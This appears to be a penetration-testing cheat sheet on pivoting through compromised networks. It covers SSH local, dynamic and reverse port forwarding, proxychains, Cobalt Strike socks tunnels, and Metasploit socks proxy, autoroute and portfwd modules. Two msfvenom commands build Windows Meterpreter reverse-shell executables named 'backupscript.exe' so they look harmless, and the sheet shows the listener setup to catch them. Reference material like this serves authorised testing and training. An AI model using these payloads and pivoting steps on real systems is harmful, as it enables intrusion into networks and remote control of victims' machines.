Dynamic Port Forwarding (SSH + Socks)
Local Port Forward SSH
It sends the data from <local-port>
to <remote-port
on the target server.
# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port>
# Confirm Port Forwarding
netstat -antp | grep <localport>
# Forwarding Several Ports
ssh -L <local-port>:localhost:<remote-port> <local-port>:localhost:<remote-port> <user>@<IP>
SSH Tunneling over SOCKS Proxy
# SSH Command
ssh -D 1080 <user>@<IP>
# Check Proxychains Conf File
/etc/proxychains.conf
socks4 127.0.0.1 1080
Reverse Port Forwarding SSH
# Generate Reverse Shell, with the IP of the internal host.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
# Set lport 8000
# set lhost 127.0.0.1
# Reverse Port Forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
Cobalt Tunneling & Port Forwarding
# Socks4 Proxy
socks 1080
# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Reverse Port Forward
rportfwd
MSF Socks Proxy
use auxiliary/server/socks_proxy
set srvport 1080
set servhost 0.0.0.0
set version 4a
# Verify Proxy runs
jobs
Metasploit Autoroute
use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run
# Shorter Method
run autoroute -s <ip>/24
Metasploit Port Forwarding
portfwd add -l <local-port> -p <remote-port> -r <ip>
Metasploit Reverse Forwarding
portfwd add -R -l <local-port> -p <remote-port> -L <tun0>
# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <value -l>
set lhost 0.0.0.0
run
# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>
Last updated